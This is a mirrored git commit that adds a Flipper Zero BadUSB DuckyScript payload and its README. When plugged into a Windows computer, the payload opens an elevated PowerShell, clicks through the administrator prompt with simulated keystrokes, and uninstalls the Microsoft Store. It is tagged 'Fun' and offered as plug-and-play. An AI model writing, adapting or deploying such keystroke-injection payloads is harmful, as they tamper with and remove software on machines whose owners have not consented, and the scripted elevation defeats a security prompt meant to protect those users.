mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2026-09-18 20:31:30 +00:00
Adding lost UNC0V3R3D BadUSB Collection
This commit is contained in:
+22
@@ -0,0 +1,22 @@
|
||||
REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
|
||||
REM Description: Deletes the Microsoft Store
|
||||
REM Version: 1.0
|
||||
REM Category: Fun
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 300
|
||||
REM Start PowerShell as Admin
|
||||
STRING powershell Start-Process powershell -Verb runAs
|
||||
DELAY 300
|
||||
ENTER
|
||||
DELAY 500
|
||||
LEFTARROW
|
||||
DELAY 450
|
||||
ENTER
|
||||
DELAY 600
|
||||
REM Deletes Microsoft Store
|
||||
STRING Get-AppxPackage *windowsstore*|Remove-AppxPackage
|
||||
DELAY 200
|
||||
ENTER
|
||||
|
||||
|
||||
+35
@@ -0,0 +1,35 @@
|
||||
|
||||
# DeleteMicrosoftStore
|
||||
This script will delete the Microsoft Store.
|
||||
|
||||
## How to use?
|
||||
|
||||
This script is plug and play.
|
||||
|
||||
|
||||
## Features
|
||||
|
||||
- open powershell
|
||||
- remove MS store package
|
||||
|
||||
|
||||
## Feedback
|
||||
|
||||
If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Support
|
||||
|
||||
For support, contact me via Discord "UNC0V3R3D#8662".
|
||||
|
||||
|
||||
## Meta
|
||||
|
||||
|
||||
- If you want to sponsor me on Patreon, the link is on my profile.
|
||||
|
||||
|
||||
Reference in New Issue
Block a user